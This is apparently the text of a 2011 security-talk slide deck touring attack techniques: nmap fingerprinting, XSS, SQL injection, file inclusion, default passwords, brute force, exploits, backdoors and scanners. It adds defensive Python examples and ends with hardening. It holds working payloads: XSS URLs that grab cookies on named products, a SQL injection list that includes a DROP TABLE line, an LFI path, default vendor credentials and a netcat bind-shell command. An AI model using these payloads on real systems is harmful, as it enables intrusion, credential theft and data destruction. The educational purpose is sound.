2. Agenda
Fingerprint
Flaws
Backdoor
Brute force
Shellcode
Exploits
Scanner
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
3. FingerPrint
Gathers information about a target host.
Ex: it is used to identify the operating system and/or
service (daemon) version number from the unique
characteristics of the host's TCP/IP responses.
The best tool for discovering operating systems, services,
devices and more: NMAP (Network Mapper)
Basic commands:
nmap host (Basic)
nmap -sV host (Service versions)
nmap -PN host (Ignore ICMP echo reply, i.e. skip host discovery; spelled -Pn in current Nmap)
nmap -O host (Try to grab the O.S. version)
nmap -f host (Firewall/IDS/IPS evasion via fragmented packets)
4. Passive - FingerPrint
• TTL - what Time To Live the operating system sets
on the outbound packet
• Window Size - what TCP Window Size the operating
system sets.
• DF - whether the operating system sets the Don't Fragment bit.
• TOS - whether the operating system sets the Type of Service,
and if so, to what value.
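As an added illustration (not code from the talk): a minimal passive fingerprinter in Python that reads the four fields listed above from a raw IPv4/TCP SYN and compares them with a small signature table. The signature values and the sample packets are constructed for this example; real tools such as p0f carry far larger databases.

```python
import struct

# Illustrative signatures (assumption, not a real database):
# (initial TTL, TCP window size, DF bit set) -> guess
SIGNATURES = {
    (64, 5840, True): "Linux 2.6 (generic)",
    (128, 8192, True): "Windows (generic)",
    (64, 65535, True): "FreeBSD/macOS (generic)",
}

def parse_ip_tcp(pkt: bytes) -> dict:
    """Extract TTL, TOS, DF and the TCP window from a raw IPv4 + TCP header."""
    ver_ihl, tos, _total, _ident, flags_frag, ttl, proto = struct.unpack("!BBHHHBB", pkt[:10])
    if (ver_ihl >> 4) != 4 or proto != 6:
        raise ValueError("not an IPv4/TCP packet")
    ihl = (ver_ihl & 0x0F) * 4          # IP header length in bytes
    tcp = pkt[ihl:ihl + 20]
    window = struct.unpack("!H", tcp[14:16])[0]
    return {"ttl": ttl, "tos": tos, "df": bool(flags_frag & 0x4000), "window": window}

def initial_ttl(observed: int) -> int:
    """Guess the sender's starting TTL: the smallest common default >= observed."""
    for default in (32, 64, 128, 255):
        if observed <= default:
            return default
    return 255

def fingerprint(pkt: bytes) -> tuple:
    """Return (parsed fields, OS guess) for one packet."""
    fields = parse_ip_tcp(pkt)
    key = (initial_ttl(fields["ttl"]), fields["window"], fields["df"])
    return fields, SIGNATURES.get(key, "unknown")

def build_syn(ttl: int, tos: int, df: bool, window: int) -> bytes:
    """Constructed sample IPv4/TCP SYN (test input, not captured traffic)."""
    flags_frag = 0x4000 if df else 0
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, tos, 40, 1, flags_frag, ttl, 6, 0,
                     bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 0, 0, 0x50, 0x02, window, 0, 0)
    return ip + tcp

if __name__ == "__main__":
    for ttl, win in ((61, 5840), (121, 8192), (250, 5840)):
        print(ttl, win, fingerprint(build_syn(ttl, 0, True, win))[1])
```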
7. FingerPrint
In BackTrack Linux you can find many tools for
fingerprinting:
http://www.backtrack-linux.com
8. Web Vulnerability
These vulnerabilities are initially exploited through
malicious browser requests, compromising the target
in a matter of minutes:
Cross-Site Scripting (XSS) – Reflected / Stored
SQL-Injection
PHP (LFI / RFI/ AFU / RCE)
9. Web Vulnerability
Cross-site scripting (XSS) is a type of computer security
vulnerability typically found in web applications that enables
malicious attackers to inject client-side script into web pages
viewed by other users.
Spekx – Knowledge Base
http://server/pls/ksp_acesso.login_script?p_time=%221%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
LMS Web Ensino – TOTVS
http://site/lms/sistema/webensino/index.php?modo=resbusca_biblioteca&pChave=a%22%2F%3E+%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&Submit=Buscar
12. What is the impact?
Why?
Examples?
13. Web Vulnerability
SQL-Injection
It occurs when an attacker can insert SQL statements
into a query by manipulating the application's input data.
SELECT fields FROM table WHERE field = 'test@test.com';
Injected string: some' OR 'x'='x
SELECT fields FROM table WHERE field = 'some' OR 'x'='x';
admin'--
" or 0=0 #
' or 1=1--
hi' or 'a'='a
' or 0=0 --
or 0=0 #
" or 1=1--
hi') or ('a'='a
" or 0=0 --
' or 'x'='x
or 1=1--
hi") or ("a"="a
or 0=0 --
" or "x"="x
' or a=a--
');Drop table x;--
' or 0=0 #
') or ('x'='x
hi" or 1=1 --
') or ('a'='a
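An added example (not from the talk) showing why the injected string above changes the query's meaning, and the fix: the lookup built by string concatenation beside the same lookup with a bound parameter. The users table and rows are constructed for the example, using SQLite in memory.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for the slide's 'table'/'field'."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, email TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin@test.com", "admin"), (2, "test@test.com", "user")])
    return db

def lookup_vulnerable(db: sqlite3.Connection, email: str) -> list:
    """String concatenation: the input becomes part of the SQL grammar.
    With "some' OR 'x'='x" the WHERE clause is always true and every row comes back."""
    sql = "SELECT id, email, role FROM users WHERE email = '" + email + "'"
    return db.execute(sql).fetchall()

def lookup_safe(db: sqlite3.Connection, email: str) -> list:
    """Parameterized query: the input is always a value, never SQL,
    so the same string simply matches no e-mail address."""
    return db.execute("SELECT id, email, role FROM users WHERE email = ?",
                      (email,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for probe in ("test@test.com", "some' OR 'x'='x"):
        print(repr(probe), len(lookup_vulnerable(db, probe)), len(lookup_safe(db, probe)))
```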
14. SQL-Injection
LIVE DEMO OCOMON
Throwing fudge at the fan
15. Web Vulnerability
CGI/PHP Command Injection
It occurs when the attacker inserts a series of
commands, exploiting vulnerable CGI/PHP scripts.
OneorZero – AFU + LFI
http://server/oneorzero/index.php?controller=../[FILE].php
WordPress TimThumb (Theme) Plugin – RCE
16. Default/Weak passwords
Default passwords are set by the manufacturer/developer
and are not changed after installation/configuration.
They are supplied by the system vendor and meant to be changed at
installation time (nobody does this shit).
Ex: 3Com switch:
User: security - Pass: security
FireBird:
User: sysdba - Pass: masterkey
Weak: passwords that are easily guessed or that follow a
keyboard sequence.
Ex: 123456 - Love - home phone number - birthday - etc.
17. Brute Force
It consists of trying combinations of characters, numbers
and symbols, wordlists and/or string generators until a
password is cracked.
Ex:
John the Ripper
Hydra
SSH Brute Force
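From the defender's side, the SSH brute force named above leaves a very recognisable trace in the sshd log. As an added example (not part of the talk), this Python detector counts failed logins per source address inside a sliding window and escalates when a success follows a burst of failures; the log lines are constructed in OpenSSH/syslog format, not taken from a real host.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in OpenSSH/syslog format (not from a real host).
SAMPLE_LOG = """\
Nov 03 10:21:01 srv sshd[2101]: Failed password for invalid user admin from 10.0.0.5 port 40001 ssh2
Nov 03 10:21:02 srv sshd[2102]: Failed password for root from 10.0.0.5 port 40002 ssh2
Nov 03 10:21:03 srv sshd[2103]: Failed password for root from 10.0.0.5 port 40003 ssh2
Nov 03 10:21:04 srv sshd[2104]: Failed password for root from 10.0.0.5 port 40004 ssh2
Nov 03 10:21:05 srv sshd[2105]: Failed password for root from 10.0.0.5 port 40005 ssh2
Nov 03 10:21:09 srv sshd[2106]: Accepted password for root from 10.0.0.5 port 40006 ssh2
Nov 03 10:30:00 srv sshd[2107]: Failed password for alice from 192.168.1.20 port 50001 ssh2
Nov 03 10:45:00 srv sshd[2108]: Failed password for alice from 192.168.1.20 port 50002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d{2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+")

def parse(log: str):
    """Yield (timestamp, result, user, source ip) for each sshd auth line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            # syslog lines carry no year; the year is assumed for the example
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=2011)
            yield ts, m["result"], m["user"], m["ip"]

def detect(log: str, threshold: int = 5, window: timedelta = timedelta(minutes=1)) -> dict:
    """Map each source IP to a verdict: 'brute-force' (>= threshold failures inside
    the window) or 'compromised' (a successful login after such a burst)."""
    failures = defaultdict(list)
    verdict = {}
    for ts, result, _user, ip in parse(log):
        if result == "Failed":
            recent = [t for t in failures[ip] if ts - t <= window] + [ts]
            failures[ip] = recent
            if len(recent) >= threshold:
                verdict.setdefault(ip, "brute-force")
        elif verdict.get(ip) == "brute-force":
            verdict[ip] = "compromised"   # success right after a burst: escalate
    return verdict

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```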
18. Brute Force
DirBuster - DirBuster is a multi-threaded Java application designed
to brute force directory and file names on web/application servers
19. Exploits
Kinds of Exploits:
Local: usually the objective of a local exploit is to elevate
the user's privileges on the machine as close as possible to
root (uid=0) or Administrator. They are written to exploit
kernel bugs or suid binaries.
Remote: works over a network connection and
exploits the vulnerable target without any prior access to it.
www.securityfocus.com
www.secunia.com
www.exploit-db.com
0-days: usually an unpublished exploit for a newly
found vulnerability. You can buy them! $$$$$
20. Exploits
What if the kernel is patched?
Will we cry?
Alexos=>
21. Exploits
No!!!! Fuck him!!!
We have other ways to pwn the box:
GNU C library dynamic linker
Suid binaries
Etc...
22. Backdoors/RootKits
Used to maintain access to the system.
We can use Netcat for this purpose:
nc -vlp 5555 -e /bin/bash
PHP - ASP - JSP
RootKits
The main purpose of a rootkit is to hide the attacker's presence
by replacing vital system binaries on the target system.
Examples:
Hide files (whose names match given strings)
Run a command when a string matches
Hide processes
Hide open ports, and others.
23. Scanners/Fuzzers
There are 2 types of scanners: specific ones, written for
a specific vulnerability (BSQLHacker, SQLMAP), and generic
ones, written for various kinds of vulnerabilities. Generic
scanners use known service banners/strings to locate
potential targets/vulnerabilities.
W3af
Nessus
26. Sniffers
A sniffer monitors and analyzes network traffic. Some of these
packets may contain critical information (such as logins,
passwords and other cool info).
Wireshark
29. Hardening your server
HnTool is an open source (GPLv2) hardening tool for Unix.
It scans your system for vulnerabilities or problems in
configuration files allowing you to get a quick overview of
the security status of your system.